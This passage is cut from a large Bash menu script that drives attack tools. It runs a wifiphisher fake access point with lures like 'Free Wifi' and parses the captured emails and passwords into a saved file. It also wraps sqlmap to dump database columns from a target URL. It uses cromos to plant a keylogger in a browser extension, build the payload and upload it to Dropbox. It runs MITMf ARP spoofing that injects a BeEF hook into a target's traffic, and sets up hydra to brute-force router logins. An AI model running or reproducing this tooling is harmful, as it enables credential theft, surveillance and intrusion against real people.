6946 echo -e ""$YS" 4"$CE") Copy all-saved-passwords file to desktop"
6947 echo -e ""$YS" 5"$CE") Delete the all-saved-passwords file"
6948 echo -e ""$YS" 6"$CE") Fix no wifi issue after the attack"
6949 echo -e ""$YS" b"$CE") Go back"
6950 echo -e "Choose:"
6951 read wifimenu
6952 clear
6953 if [[ "$wifimenu" == 1 ]]
6954 then
6955 wififb
6956 elif [[ "$wifimenu" == 2 ]]
6957 then
6958 wififb_pass
6959 echo -e "$PAKTGB"
6960 $READAK
6961 elif [[ "$wifimenu" == 3 ]]
6962 then
6963 if [[ -f $wififbpassfileall ]]
6964 then
6965 cat $wififbpassfileall
6966 else
6967 echo -e ""$RS"File not found. Get some paswords first."$CE""
6968 fi
6969 echo -e "$PAKTGB"
6970 $READAK
6971 elif [[ "$wifimenu" == 4 ]]
6972 then
6973 cp $wififbpassfileall /root/Desktop/all-saved-passwords.txt && echo -e "Done"
6974 elif [[ "$wifimenu" == 5 ]]
6975 then
6976 rm $wififbpassfileall && echo -e "Done"
6977 elif [[ "$wifimenu" == 6 ]]
6978 then
6979 nmcli n on
6980 echo -e "Error fixed, you may need to restart your system"
6981 echo -e "$PAKTGB"
6982 $READAK
6983 elif [[ "$wifimenu" == 'b' || "$wifimenu" == "back" || "$wifimenu" == 00 ]]
6984 then
6985 exec bash $0
6986 fi
6987 done
6988}
6989function wififb
6990{
6991 echo -e "Access point's name: "
6992 echo -e " "$YS"1"$CE") Free Wifi"
6993 echo -e " "$YS"2"$CE") FREE WIFI"
6994 echo -e " "$YS"3"$CE") Wifi Hotspot"
6995 echo -e " "$YS"4"$CE") WIFI HOTSPOT"
6996 echo -e " "$YS"5"$CE") Hotspot"
6997 echo -e " "$YS"6"$CE") Android Hotspot"
6998 echo -e " "$YS"7"$CE") Cafe Wifi"
6999 echo -e " "$YS"8"$CE") Public Wifi"
7000 echo -e " "$YS"9"$CE") PUBLIC WIFI"
7001 echo -e ""$YS"10"$CE") Free Public Wifi"
7002 echo -e ""$YS"11"$CE") FREE PUBLIC WIFI"
7003 echo -e " "$YS"c"$CE") Custom name"
7004 echo -e " "$YS"b"$CE") Go back"
7005 read wifiind
7006 if [[ "$wifiind" == 1 ]]
7007 then
7008 wifiname="Free Wifi"
7009 elif [[ "$wifiind" == 2 ]]
7010 then
7011 wifiname="FREE WIFI"
7012
7013 elif [[ "$wifiind" == 3 ]]
7014 then
7015 wifiname="Wifi Hotspot"
7016
7017 elif [[ "$wifiind" == 4 ]]
7018 then
7019 wifiname="WIFI HOTSPOT"
7020
7021 elif [[ "$wifiind" == 5 ]]
7022 then
7023 wifiname="Hotspot"
7024
7025 elif [[ "$wifiind" == 6 ]]
7026 then
7027 wifiname="Android Hotspot"
7028
7029 elif [[ "$wifiind" == 7 ]]
7030 then
7031 wifiname="Cafe Wifi"
7032
7033 elif [[ "$wifiind" == 8 ]]
7034 then
7035 wifiname="Public Wifi"
7036
7037 elif [[ "$wifiind" == 9 ]]
7038 then
7039 wifiname="PUBLIC WIFI"
7040
7041 elif [[ "$wifiind" == 10 ]]
7042 then
7043 wifiname="Free Public Wifi"
7044
7045 elif [[ "$wifiind" == 11 ]]
7046 then
7047 wifiname="FREE PUBLIC WIFI"
7048
7049 elif [[ "$wifiind" == 'c' ]]
7050 then
7051 clear
7052 echo -e "Custom access point name:"
7053 read wifiname
7054 elif [[ "$wifiind" == 'b' || "$wifiind" == 'back' ]]
7055 then
7056 wififb_attack
7057 fi
7058 ESSIDAP=$wifiname
7059 export ESSIDAP
7060 export wififbfile
7061 xterm -hold -geometry 160x60+9999+999999 -e bash -c 'printf "\033]2;WIFI FB TRAP\a" && wifiphisher --noextensions --essid "$ESSIDAP" -p oauth-login -kB --logging | tee $wififbfile; exec bash' & disown
7062}
7063function wififb_pass
7064{
7065 if [[ -f $wififbfile ]]
7066 then
7067 ##findhowmanylines
7068 lines=$(cat $wififbfile | awk 'END{print NR}')
7069 n=1
7070 z=0
7071 while [[ "$n" -le "$lines" ]]
7072 do
7073 USERNAME=""
7074 PASS=""
7075 USERNAME=$(cat $wififbfile | awk -v nn="$n" '{if(NR==nn && /wfphshr-email=/)print}' | awk -F "email=" {'print $2'} | cut -d '&' -f1)
7076 if [[ ! "$USERNAME" == "" ]]
7077 then
7078 z=$((z+1))
7079 PASS=$(cat $wififbfile | awk -v nn="$n" '{if(NR==nn && /word=/)print}' | awk -F "word=" {'print $2'} | cut -d '' -f1)
7080 if [[ "$PASS" == "" ]]
7081 then
7082 PASS="No password found"
7083 fi
7084 echo -e ""$USERNAME":"$PASS"" >> $wififbpassfile
7085 fi
7086 USERNAME=""
7087 PASS=""
7088 n=$((n+1))
7089 done
7090 if [[ "$z" == 0 ]]
7091 then
7092 echo -e "No usernames or passwords found" >> $wififbpassfile
7093 fi
7094 echo -e "----------------------------------------------------------------" >> $wififbpassfile
7095 cat $wififbpassfile
7096 if [[ ! "$z" == 0 ]]
7097 then
7098 cat $wififbpassfile >> $wififbpassfileall
7099 cat $wififbfile >> $wififbfileall
7100 echo -e "New usernames/passwords moved to all-saved-passwords file"
7101 fi
7102 echo -e "" > $wififbpassfile
7103 echo -e "" > $wififbfile
7104 else
7105 echo -e ""$RS"$wififbfile not found."$CE""
7106 sleep 3
7107 fi
7108}
7109function sqlmap_menu
7110{
7111file2="/root/lscript/sqltemp2"
7112file3="/root/lscript/sqltemp3"
7113file4="/root/lscript/sqltemp34"
7114while true
7115do
7116 clear
7117 TERMINALTITLE="SQLMAP"
7118 dash_calc
7119 printf '\033]2;SQLMAP\a'
7120 if [[ "$URL" = "" ]]
7121 then
7122 URL=""$RS"None"$CE""
7123 urls=0
7124 fi
7125 if [[ "$FDBS" = "" ]]
7126 then
7127 FDBS=""$RS"None"$CE""
7128 fdbss=0
7129 fi
7130 if [[ "$SD" = "" ]]
7131 then
7132 SD=""$RS"None"$CE""
7133 sds=0
7134 fi
7135 if [[ "$TB" = "" ]]
7136 then
7137 TB=""$RS"None"$CE""
7138 tbs=0
7139 fi
7140 if [[ "$ST" = "" ]]
7141 then
7142 ST=""$RS"None"$CE""
7143 sts=0
7144 fi
7145 if [[ "$CL" = "" ]]
7146 then
7147 CL=""$RS"None"$CE""
7148 cls=0
7149 fi
7150 if [[ "$SC" = "" ]]
7151 then
7152 SC=""$RS"None"$CE""
7153 scs=0
7154 fi
7155 echo -e ""$YS" 1"$CE") URL Current:"$YS"$URL"$CE""
7156 if [[ "$urls" = 0 ]]
7157 then
7158 echo -e ""$RS" 2"$CE") Fetch databases Current:$FDBS"
7159 else
7160 echo -e ""$YS" 2"$CE") Fetch databases Current:$FDBS"
7161 fi
7162 if [[ "$fdbss" = 0 ]]
7163 then
7164 echo -e ""$RS" 3"$CE") Select database Current:"$YS"$SD"$CE""
7165 else
7166 echo -e ""$YS" 3"$CE") Select database Current:"$YS"$SD"$CE""
7167 fi
7168 if [[ "$sds" = 0 ]]
7169 then
7170 echo -e ""$RS" 4"$CE") Fetch tables Current:"$YS"$TB"$CE""
7171 else
7172 echo -e ""$YS" 4"$CE") Fetch tables Current:"$YS"$TB"$CE""
7173 fi
7174 if [[ "$tbs" = 0 ]]
7175 then
7176 echo -e ""$RS" 5"$CE") Select table Current:"$YS"$ST"$CE""
7177 else
7178 echo -e ""$YS" 5"$CE") Select table Current:"$YS"$ST"$CE""
7179 fi
7180 if [[ "$sts" = 0 ]]
7181 then
7182 echo -e ""$RS" 6"$CE") Fetch columns Current:"$YS"$CL"$CE""
7183 else
7184 echo -e ""$YS" 6"$CE") Fetch columns Current:"$YS"$CL"$CE""
7185 fi
7186 if [[ "$cls" = 0 ]]
7187 then
7188 echo -e ""$RS" 7"$CE") Select columns Current:"$YS"$SC"$CE""
7189 else
7190 echo -e ""$YS" 7"$CE") Select columns Current:"$YS"$SC"$CE""
7191 fi
7192 if [[ "$scs" = 0 ]]
7193 then
7194 echo -e ""$RS" s"$CE") Start"
7195 else
7196 echo -e ""$YS" s"$CE") Start"
7197 fi
7198 echo -e ""$YS" b"$CE") Go back"
7199 echo -e "Choose: "
7200 read SQ
7201 clear
7202 if [[ "$SQ" = 1 ]]
7203 then
7204 echo -n "URL: "
7205 read URLL
7206 if [[ "$URLL" != "" || "$URLL" = "b" ]]
7207 then
7208 URL="$URLL"
7209 urls=1
7210 ##Clearing nexts
7211 FDBS=""
7212 fdbss=0
7213 SD=""
7214 sds=0
7215 TB=""
7216 tbs=0
7217 ST=""
7218 sts=0
7219 cls=0
7220 CL=""
7221 scs=0
7222 SC=""
7223 fi
7224 elif [[ "$SQ" = "s" ]]
7225 then
7226 if [[ "$scs" = 0 ]]
7227 then
7228 echo -e ""$RS"No columns selected"$CE""
7229 sleep 2
7230 break
7231 fi
7232 #~ export URL
7233 #~ export SD
7234 #~ export ST
7235 #~ export SC
7236 sqlmap -u "$URL" -D "$SD" -T "$ST" -C "$SC" --dump | tee "$file4"
7237 echo -e ""
7238 echo -e ""$YS"A log file has been created on "$file4". Copy it before it gets overwritten"$CE""
7239 echo -e ""
7240 echo -e "$PAKTGB"
7241 $READAK
7242 elif [[ "$SQ" = "b" ]]
7243 then
7244 break
7245 elif [[ "$SQ" = 00 ]]
7246 then
7247 exec bash $0
7248 elif [[ "$SQ" = 7 ]]
7249 then
7250 if [[ "$cls" = 0 ]]
7251 then
7252 echo -e ""$RS"Columns not fetched"$CE""
7253 sleep 2
7254 break
7255 fi
7256 n10=1
7257 CCO1="$CO1"
7258 while [[ "$n10" -le "$NCO" ]]
7259 do
7260 cl[$n10]=$(cat "$file3" | awk -v n12="$CCO1" '{if(NR==n12)print}' | cut -d ' ' -f2)
7261 CCO1=$((CCO1+1))
7262 n10=$((n10+1))
7263 done
7264 while true
7265 do
7266 clear
7267 echo -e ""$BS"Columns: "$CE""
7268 v=1
7269 while [[ "$v" -le "$NCO" ]]
7270 do
7271 if [[ "${selc[$v]}" = 1 ]]
7272 then
7273 SSC="$YS"
7274 else
7275 SSC="$WS"
7276 fi
7277 if [[ "$v" -le 9 ]]
7278 then
7279 echo -e ""$YS" $v"$CE") "$SSC"${cl[$v]}"$CE""
7280 elif [[ "$v" -le 99 ]]
7281 then
7282 echo -e ""$YS" $v"$CE") "$SSC"${cl[$v]}"$CE""
7283 else
7284 echo -e ""$YS"$v"$CE") "$SSC"${cl[$v]}"$CE""
7285 fi
7286 v=$((v+1))
7287 done
7288 echo -e ""$YS" d"$CE") Deselect all"
7289 echo -e ""$YS" s"$CE") Save selection"
7290 echo -e ""$YS" b"$CE") Go back"
7291 echo -e "Choose: "
7292 read COCH
7293 clear
7294 if [[ "$COCH" = "b" || "$COCH" = "back" ]]
7295 then
7296 break
7297 elif [[ "$COCH" = "s" ]]
7298 then
7299 v2=1
7300 SC=""
7301 while [[ "$v2" -le "$NCO" ]]
7302 do
7303 if [[ "${selc[$v2]}" = 1 ]]
7304 then
7305 if [[ "$SC" = "" ]]
7306 then
7307 SC="${cl[$v2]}"
7308 else
7309 SC=""$SC","${cl[$v2]}""
7310 fi
7311 fi
7312 v2=$((v2+1))
7313 done
7314 if [[ "$SC" = "" ]]
7315 then
7316 echo -e ""$RS"Nothing selected"$CE""
7317 ssc=0
7318 sleep 2
7319 else
7320 ssc=1
7321 fi
7322 break
7323 elif [[ "$COCH" = "d" ]]
7324 then
7325 v1=1
7326 while [[ "$v1" -le "$NCO" ]]
7327 do
7328 selc[$v1]=""
7329 v1=$((v1+1))
7330 done
7331 elif [[ "$COCH" -le 0 || "$COCH" -gt "$NCO" ]]
7332 then
7333 echo -e ""$RS"Wrong choice"$CE""
7334 sleep 2
7335 continue
7336 else
7337 if [[ "${selc[$COCH]}" != 1 ]]
7338 then
7339 selc[$COCH]=1
7340 else
7341 selc[$COCH]=""
7342 fi
7343 fi
7344 done
7345 elif [[ "$SQ" = 6 ]]
7346 then
7347 while true
7348 do
7349 if [[ "$sts" = 0 ]]
7350 then
7351 echo -e ""$RS"Table not selected"$CE""
7352 sleep 2
7353 break
7354 fi
7355 sqlmap -u "$URL" -D "$SD" -T "$ST" --columns <<< $'\n\n\n\n\n\n\n\n\n\n' | tee $file3
7356 ##finding columns
7357 CO=$(cat "$file3" | awk '{if(/+----/)print NR}')
7358 CO1=$(echo $CO | cut -d ' ' -f2)
7359 CO1=$((CO1+1))
7360 CO2=$(echo $CO | cut -d ' ' -f3)
7361 CO2=$((CO2-1))
7362 NCO=$((CO2-CO1))
7363 if [[ "$NCO" -le 0 ]]
7364 then
7365 echo -e ""$RS"Error 24. No columns found automatically"$CE""
7366 sleep 2
7367 cls=0
7368 continue
7369 else
7370 if [[ "$NCO" = 1 ]]
7371 then
7372 echo -e ""$YS"1 column found!"$CE""
7373 sleep 2
7374 else
7375 echo -e ""$YS""$NCO" columns found!"$CE""
7376 sleep 2
7377 fi
7378 CL="Done"
7379 cls=1
7380 break
7381 fi
7382 done
7383 elif [[ "$SQ" = 5 ]]
7384 then
7385 while true
7386 do
7387 if [[ "$tbs" = 0 ]]
7388 then
7389 echo -e ""$RS"Tables not fetched"$CE""
7390 sleep 2
7391 break
7392 fi
7393 echo -e ""$BS"Tables: "$CE""
7394 n9=1
7395 CC1="$C1"
7396 while [[ "$n9" -le "$NTB" ]]
7397 do
7398 tb[$n9]=$(cat "$file2" | awk -v n11="$CC1" '{if(NR==n11)print}' | cut -d ' ' -f2)
7399 if [[ "$n9" -le 9 ]]
7400 then
7401 echo -e ""$YS" $n9"$CE") ${tb[$n9]}"
7402 elif [[ "$n9" -le 99 ]]
7403 then
7404 echo -e ""$YS" $n9"$CE") ${tb[$n9]}"
7405 else
7406 echo -e ""$YS"$n9"$CE") ${tb[$n9]}"
7407 fi
7408 CC1=$((CC1+1))
7409 n9=$((n9+1))
7410 done
7411 echo -e ""$YS" b"$CE") Go back"
7412 echo -e "Choose: "
7413 read TCH
7414 if [[ "$TCH" = "b" || "$TCH" = "back" ]]
7415 then
7416 break
7417 elif [[ "$TCH" -le 0 || "$TCH" -gt "$NTB" ]]
7418 then
7419 echo -e ""$RS"Wrong choice"$CE""
7420 sleep 2
7421 continue
7422 else
7423 ST="${tb[$TCH]}"
7424 sts=1
7425 ##Clearing nexts
7426 cls=0
7427 CL=""
7428 scs=0
7429 SC=""
7430 break
7431 fi
7432 done
7433 elif [[ "$SQ" = 4 ]]
7434 then
7435 if [[ "$sds" = 0 ]]
7436 then
7437 echo -e ""$RS"Databases not selected"$CE""
7438 sleep 2
7439 continue
7440 fi
7441 sqlmap -u "$URL" -D "$SD" --tables <<< $'\n\n\n\n\n\n\n\n\n\n' | tee "$file2"
7442 ##finding tables
7443 C=$(cat "$file2" | awk '{if(/+----/)print NR}')
7444 C1=$(echo $C | cut -d ' ' -f1)
7445 C1=$((C1+1))
7446 C2=$(echo $C | cut -d ' ' -f2)
7447 C2=$((C2-1))
7448 NTB=$((C2-C1))
7449 if [[ "$NTB" -le 0 ]]
7450 then
7451 echo -e ""$RS"Error 23. No tables found automatically"$CE""
7452 sleep 2
7453 tbs=0
7454 continue
7455 else
7456 if [[ "$NTB" = 1 ]]
7457 then
7458 echo -e ""$YS"1 table found!"$CE""
7459 sleep 2
7460 else
7461 echo -e ""$YS""$NTB" tables found!"$CE""
7462 sleep 2
7463 fi
7464 TB="Done"
7465 tbs=1
7466 ##Clearing nexts
7467 ST=""
7468 sts=0
7469 cls=0
7470 CL=""
7471 scs=0
7472 SC=""
7473 fi
7474 elif [[ "$SQ" = 3 ]]
7475 then
7476 while true
7477 do
7478 if [[ "$fdbss" = 0 ]]
7479 then
7480 echo -e ""$RS"Databases not fetched"$CE""
7481 sleep 2
7482 continue
7483 fi
7484 echo -e ""$BS"Databases: "$CE""
7485 n8=1
7486 while [[ "$n8" -le "$NDB" ]]
7487 do
7488 if [[ "$n8" -le 9 ]]
7489 then
7490 echo -e ""$YS" "$n8""$CE") ${db[$n8]}"
7491 elif [[ "$n8" -le 99 ]]
7492 then
7493 echo -e ""$YS" "$n8""$CE") ${db[$n8]}"
7494 else
7495 echo -e ""$YS""$n8""$CE") ${db[$n8]}"
7496 fi
7497 n8=$((n8+1))
7498 done
7499 echo -e ""$YS" b"$CE") Go back"
7500 echo -e "Choose: "
7501 read DCH
7502 clear
7503 if [[ "$DCH" = "b" || "$DCH" = "back" ]]
7504 then
7505 break
7506 fi
7507 if [[ "$DCH" -lt 0 || "$DCH" -gt "$NDB" ]]
7508 then
7509 echo -e ""$RS"Wrong choice"$CE""
7510 sleep 2
7511 else
7512 SD="${db[$DCH]}"
7513 sds=1
7514 ##Clearing nexts
7515 TB=""
7516 tbs=0
7517 ST=""
7518 sts=0
7519 cls=0
7520 CL=""
7521 scs=0
7522 SC=""
7523 break
7524 fi
7525 done
7526 elif [[ "$SQ" = 2 ]]
7527 then
7528 if [[ "$urls" != 1 ]]
7529 then
7530 echo -e ""$RS"URL not selected"$CE""
7531 sleep 2
7532 continue
7533 fi
7534 file="/root/lscript/sqltemp"
7535 sqlmap -u "$URL" --dbs <<< $'\n\n\n\n\n\n\n\n\n\n' | tee "$file"
7536 ##Find the line
7537 CHECK=$(cat "$file" | grep "available databases ")
7538 if [[ "$CHECK" = "" ]]
7539 then
7540 fdbss=0
7541 echo -e ""$RS"No databases found or not vulnerable website"$CE""
7542 fdbss=0
7543 echo -e "$PAKTGB"
7544 $READAK
7545 continue
7546 fi
7547 LINED=$(cat "$file" | awk '{if(/available databases /)print NR}')
7548 LINED=$((LINED+1))
7549 ##list databases
7550 n=0
7551 echo -e ""BS"Calculating..."$CE""
7552 while true
7553 do
7554 CH=$(cat "$file" | awk -v n7="$LINED" '{if(NR==n7)print}')
7555 if [[ "$CH" = "" ]]
7556 then
7557 break
7558 else
7559 ##how many dbs found
7560 n=$((n+1))
7561 ##next line
7562 LINED=$((LINED+1))
7563 fi
7564 CHH=$(echo "$CH" | awk -F "] " {'print $2'})
7565 if [[ "$CHH" = "" ]]
7566 then
7567 echo -e ""$RS"Error 21"$CE""
7568 CHH=""$RS"Error"$CE""
7569 sleep 3
7570 fi
7571 db[$n]="$CHH"
7572 done
7573 sleep 1
7574 if [[ "$n" = 0 ]]
7575 then
7576 echo -e ""$RS"Error 22 No databases found automatically"$CE""
7577 echo -e "$PAKTGB"
7578 $READAK
7579 continue
7580 elif [[ "$n" = 1 ]]
7581 then
7582 echo -e ""$YS"1 database found!"$CE""
7583 sleep 1
7584 else
7585 echo -e ""$YS"$n databases found!"$CE""
7586 sleep 1
7587 fi
7588 echo -e ""
7589 FDBS=""$YS"Done"$CE""
7590 fdbss=1
7591 NDB="$n"
7592 ##Clearing nexts
7593 SD=""
7594 sds=0
7595 TB=""
7596 tbs=0
7597 ST=""
7598 sts=0
7599 cls=0
7600 CL=""
7601 scs=0
7602 SC=""
7603 fi
7604done
7605}
7606function cromos_menu
7607{
7608 if [[ ! -d /root/cromos ]]
7609 then
7610 echo -e ""$RS"Cromos directory was not found on /root"$CE""
7611 echo -e ""$RS"Fix this issue by installing it within lscript"$CE""
7612 echo -e "$PAKTGB"
7613 $READAK
7614 else
7615 cd /root/cromos
7616 while true
7617 do
7618 clear
7619 TERMINALTITLE="CROMOS MENU"
7620 dash_calc
7621 printf '\033]2;CROMOS MENU\a'
7622 if [[ "$CEX" == "" ]]
7623 then
7624 CEX="None"
7625 fi
7626 if [[ "$CMOD" == "" ]]
7627 then
7628 CMOD="keylogger"
7629 fi
7630 echo -e " Current extension: "$RS"$CEX"$CE""
7631 echo -e " "$YS"1"$CE") Download/select an extension"
7632 echo -e " "$YS"2"$CE") Choose module "$YS"$CMOD"$CE""
7633 echo -e " "$YS"3"$CE") Infect"
7634 echo -e " "$YS"4"$CE") Build"
7635 echo -e " "$YS"5"$CE") Upload to dropbox"
7636 echo -e " "$YS"b"$CE") Go back"
7637 echo -e " "$YS"0"$CE") Exit"
7638 echo -e "Choose: "
7639 read CROM
7640 clear
7641 if [[ "$CROM" == 1 ]]
7642 then
7643 echo -e "Extension ID: "
7644 read EXID
7645 python cromos.py --extension "$EXID" && CEX=""$YS"$EXID"$CE""
7646 sleep 2
7647 elif [[ "$CROM" == 2 ]]
7648 then
7649 if [[ "$CMOD" == "keylogger" ]]
7650 then
7651 CMOD="currency"
7652 else
7653 CMOD="keylogger"
7654 fi
7655 elif [[ "$CROM" == 3 ]]
7656 then
7657 python cromos.py --extension "$EXID" --load "$CMOD"
7658 sleep 2
7659 elif [[ "$CROM" == 4 ]]
7660 then
7661 echo -e "File type to build to("$YS"Enter"$CE"="$YS"bat"$CE"):"
7662 read buildext
7663 if [[ "$buildext" == "" ]]
7664 then
7665 buildext="bat"
7666 fi
7667 python cromos.py --extension "$EXID" --build "$buildext" && xdg-open /root/cromos/output/builds
7668 echo -e "$PAKTGB"
7669 $READAK
7670 elif [[ "$CROM" == 5 ]]
7671 then
7672 echo -e "Token: "
7673 read CTOK
7674 python cromos.py --extension "$EXID" --token "$CTOK"
7675 echo -e "$PAKTGB"
7676 $READAK
7677 elif [[ "$CROM" == "b" || "$CROM" == "back" ]]
7678 then
7679 break
7680 elif [[ "$CROM" == 0 ]]
7681 then
7682 exit
7683 elif [[ "$CROM" == 00 ]]
7684 then
7685 exec bach $0
7686 fi
7687 done
7688 fi
7689}
7690function mitmf_hook
7691{
7692 TERMINALTITLE="MITMF + BEEF"
7693 dash_calc
7694 printf '\033]2;MITMF + BEEF\a'
7695 if [[ -d /root/MITMf ]]
7696 then
7697 TEST=$(ifconfig | grep "$ETH")
7698 n=1
7699 echo -e ""$BS"Available interfaces"$CE": "
7700 if [[ "$TEST" != "" ]]
7701 then
7702 echo -e ""$YS"$n"$CE") "$ETH""
7703 in[$n]="$ETH"
7704 n=$((n+1))
7705 fi
7706 TEST=$(ifconfig | grep "$WLANN")
7707 if [[ "$TEST" != "" ]]
7708 then
7709 echo -e ""$YS"$n"$CE") $WLANN"
7710 in[$n]="$WLANN"
7711 n=$((n+1))
7712 fi
7713 TEST=$(ifconfig | grep "$WLANNM")
7714 if [[ "$TEST" != "" ]]
7715 then
7716 echo -e ""$YS"$n"$CE") $WLANNM"
7717 in[$n]="$WLANNM"
7718 n=$((n+1))
7719 fi
7720 echo -e "Choose: "
7721 read ints
7722 if [[ "$ints" -le "$n" && "$ints" -ge 1 ]]
7723 then
7724 #~ echo -e "You selected "$YS"${in[$ints]}"$CE"" #debugging
7725 mitmfint="${in[$ints]}"
7726 export mitmfint
7727 clear
7728 mitmfgate=$(route -n | grep "$mitmfint" | awk '{if($2!="0.0.0.0"){print $2}}')
7729 export mitmfgate
7730 clear
7731 echo -e "Target's IP: "
7732 read mitmftar
7733 TEST=$(ifconfig | grep $mitmfint)
7734 if [[ $TEST != "" ]]
7735 then
7736 iffile=""$LPATH"/iftemp.txt"
7737 ifconfig $mitmfint > $iffile
7738 mitmflocalip=$(cat $iffile | grep " inet " | awk -F "inet " {'print $2'} | cut -d ' ' -f1)
7739 fi
7740 clear
7741 echo -e "hook.js URL path("$YS"Enter"$CE"=http://"$mitmflocalip":3000/hook.js): "
7742 read hookch
7743 if [[ "$hookch" = "" ]]
7744 then
7745 mitmfhook="http://"$mitmflocalip":3000/hook.js"
7746 else
7747 mitmfhook="$hookch"
7748 fi
7749 export mitmfhook
7750 cd /root/MITMf
7751 clear
7752 python mitmf.py -i "$mitmfint" --spoof --arp --gateway "$mitmfgate" --target "$mitmftar" --hsts --inject --js-url "$mitmfhook"
7753 cd
7754 fi
7755 else
7756 echo -e ""$RS"Mitmf is not installed.type '"$CE""$YS"install"$CE""$RS"' to install it."
7757 read INSTALL
7758 if [[ "$INSTALL" = "install" ]]
7759 then
7760 echo -e ""$RS"No installation added yet"$CE""
7761 sleep 2
7762 fi
7763 fi
7764 cd
7765}
7766function bruteforce_router
7767{
7768while true
7769do
7770 clear
7771 TERMINALTITLE="BRUTEFORCE LOGIN"
7772 dash_calc
7773 TERMINALTITLE="ONLY FOR LEGAL PURPOSES"
7774 dash_calc
7775 printf '\033]2;BRUTEFORCE LOGIN\a'
7776 if [[ "$BI" = "" ]]
7777 then
7778 TT=$(ifconfig | grep "$WLANN")
7779 if [[ "$TT" = "" ]]
7780 then
7781 bin=0
7782 BI=""$RS"None"$CE""
7783 else
7784 bin=1
7785 BI="$WLANN"
7786 fi
7787 fi
7788 if [[ "$US" = "" ]]
7789 then
7790 US="admin"
7791 fi
7792 if [[ "$WL" = "" ]]
7793 then
7794 wls=0
7795 WL=""$RS"None"$CE""
7796 fi
7797 if [[ "$RQ" = "" ]]
7798 then
7799 rqq=0
7800 RQ=""$RS"None"$CE""
7801 fi
7802 if [[ "$UP" = "" ]]
7803 then
7804 upp=0
7805 UP=""$RS"None"$CE""
7806 fi
7807 if [[ "$IS" = "" ]]
7808 then
7809 iss=0
7810 IS=""$RS"None"$CE""
7811 fi
7812 if [[ "$FM" = "" ]]
7813 then
7814 FM="http-post-form"
7815 fi
7816 #~ echo -e ""$RS"ONLY FOR LEGAL PURPOSES"$CE""
7817 echo -e ""$YS" 1"$CE") Select interface Current:"$YS""$BI""$CE""
7818 echo -e ""$YS" 2"$CE") Set username Current:"$YS""$US""$CE""
7819 echo -e ""$YS" 3"$CE") Select wordlist Current:"$YS""$WL""$CE""
7820 echo -e ""$YS" 4"$CE") Request URI: Current:"$YS""$RQ""$CE""
7821 echo -e ""$YS" 5"$CE") ^USER^ & ^PASS^ field Current:"$YS""$UP""$CE""
7822 echo -e ""$YS" 6"$CE") Invalid pass string Current:"$YS""$IS""$CE""
7823 echo -e ""$YS" 7"$CE") Form Current:"$YS""$FM""$CE""
7824 echo -e ""$YS" 8"$CE") Open router's login page in browser"
7825 echo -e ""$YS" w"$CE") Open Wireshark"
7826 echo -e ""$YS" s"$CE") Start bruteforcing"
7827 echo -e ""$YS"bu"$CE") Burpsuite automated tool"
7828 echo -e ""$YS" i"$CE") Info"
7829 echo -e ""$YS" b"$CE") Go back"
7830 echo -n "Choose: "
7831 read BR
7832 clear
7833 if [[ "$BR" = "b" || "$BR" = 00 || "$BR" = "back" ]]
7834 then
7835 BACKL=1
7836 break
7837 elif [[ "$BR" = "bu" ]]
7838 then
7839 burpsuite
7840 elif [[ "$BR" = "w" ]]
7841 then
7842 wireshark & disown
7843 elif [[ "$BR" = 0 ]]
7844 then
7845 exit
7846 elif [[ "$BR" = "i" ]]
7847 then
7848 echo -e ""$LGYS"With hydra you can bruteforce your router's login screen."
7849 echo -e "Select interface"
7850 echo -e " You need to select an interface so the script can get the gateway."
7851 echo -e "Set username"
7852 echo -e " Set the username for the login screen.(e.g. admin)"
7853 echo -e "Select wordlist"
7854 echo -e " Select a text file with a password on every line."
7855 echo -e "Request URI"
7856 echo -e " You will find this on Wireshark. Follow the video below for instructions."
7857 echo -e " (e.g. /login.php) or (e.g. /cgi-bin/login.exe) etc etc..."
7858 echo -e "^USER^ & ^PASS^ field"
7859 echo -e " You will find this on Wireshark. Follow the video below for instructions."
7860 echo -e " (e.g. username=^USER^&password=^PASS^)"
7861 echo -e "Invalid pass string"
7862 echo -e " You will find this when you try to login with the wrong pass on the login page."
7863 echo -e " You need to set a word that is being printed on the screen when login fails."
7864 echo -e " (e.g. Invalid) or (e.g. Wrong) or (e.g. Please) etc etc..."
7865 echo -e " Follow the video below for instructions."
7866 echo -e "Form"
7867 echo -e " (e.g. http-get-form) or (e.g. http-post-form) etc etc..."
7868 echo -e ""
7869 echo -e "Video-demonstration: https://www.youtube.com/watch?v=vgbP0AQ5bt4"
7870 echo -e ""
7871 echo -e ""$CE""
7872 echo -e "$PAKTGB"
7873 $READAK
7874 elif [[ "$BR" = 1 ]]
7875 then
7876 select_interface
7877 if [[ "$OUTPUT" != "" && "$OUTPUT" != 0 ]]
7878 then
7879 bin=1
7880 BI="$OUTPUT"
7881 else
7882 bin=0
7883 fi
7884 elif [[ "$BR" = 2 ]]
7885 then
7886 echo -n "Username: "
7887 read US
7888 elif [[ "$BR" = 3 ]]
7889 then
7890 echo -n "Wordlist: "
7891 read WL
7892 if [[ ! -f "$WL" ]]
7893 then
7894 WL=""
7895 echo -e ""$RS"Couldn't find the wordlist"$CE""
7896 wls=0
7897 sleep 2
7898 else
7899 wls=1
7900 fi
7901 elif [[ "$BR" = 4 ]]
7902 then
7903 echo -n "Request URI: "
7904 read RQ
7905 rqq=1
7906 elif [[ "$BR" = 5 ]]
7907 then
7908 echo -n "^USER^ & ^PASS^ field: "
7909 read UP
7910 upp=1
7911 elif [[ "$BR" = 6 ]]
7912 then
7913 echo -n "Invalid pass string: "
7914 read IS
7915 iss=1
7916 elif [[ "$BR" = 7 ]]
7917 then
7918 echo -n "Form: "
7919 read FM
7920 elif [[ "$BR" = 8 ]]
7921 then
7922 if [[ "$bin" != 1 ]]
7923 then
7924 echo -e ""$RS"Please select an interface first"$CE""
7925 sleep 3
7926 continue
7927 fi
7928 TT=$(ifconfig | grep "$BI")
7929 if [[ "$TT" = "" ]]
7930 then
7931 echo -e ""$RS""$BI" is not available"$CE""
7932 sleep 2
7933 BI=""
7934 continue
7935 fi
7936 echo -e ""$BS"Searching gateway on "$BI""$CE"..."
7937 sleep 0.5
7938 GATE=$(find_gateways "$BI" interface)
7939 TTT=$(is_it_an_ip "$GATE")
7940 if [[ "$TTT" != 1 ]]
7941 then
7942 echo -e ""$RS"Couldn't find your gateway."$CE""
7943 sleep 2
7944 echo -e ""$RS"Make sure you are connected to a network"$CE""
7945 sleep 3
7946 continue
7947 else
7948 echo -e ""$YS"Gateway found: "$GATE""$CE""
7949 sleep 1
7950 fi
7951 clear
7952 gio open "http://"$GATE""
7953 echo -e "Your browser is going to open"
7954 sleep 2
7955 elif [[ "$BR" = "s" ]]
7956 then
7957 if [[ "$bin" != 1 ]]
7958 then
7959 echo -e ""$RS"Please select an interface first"$CE""
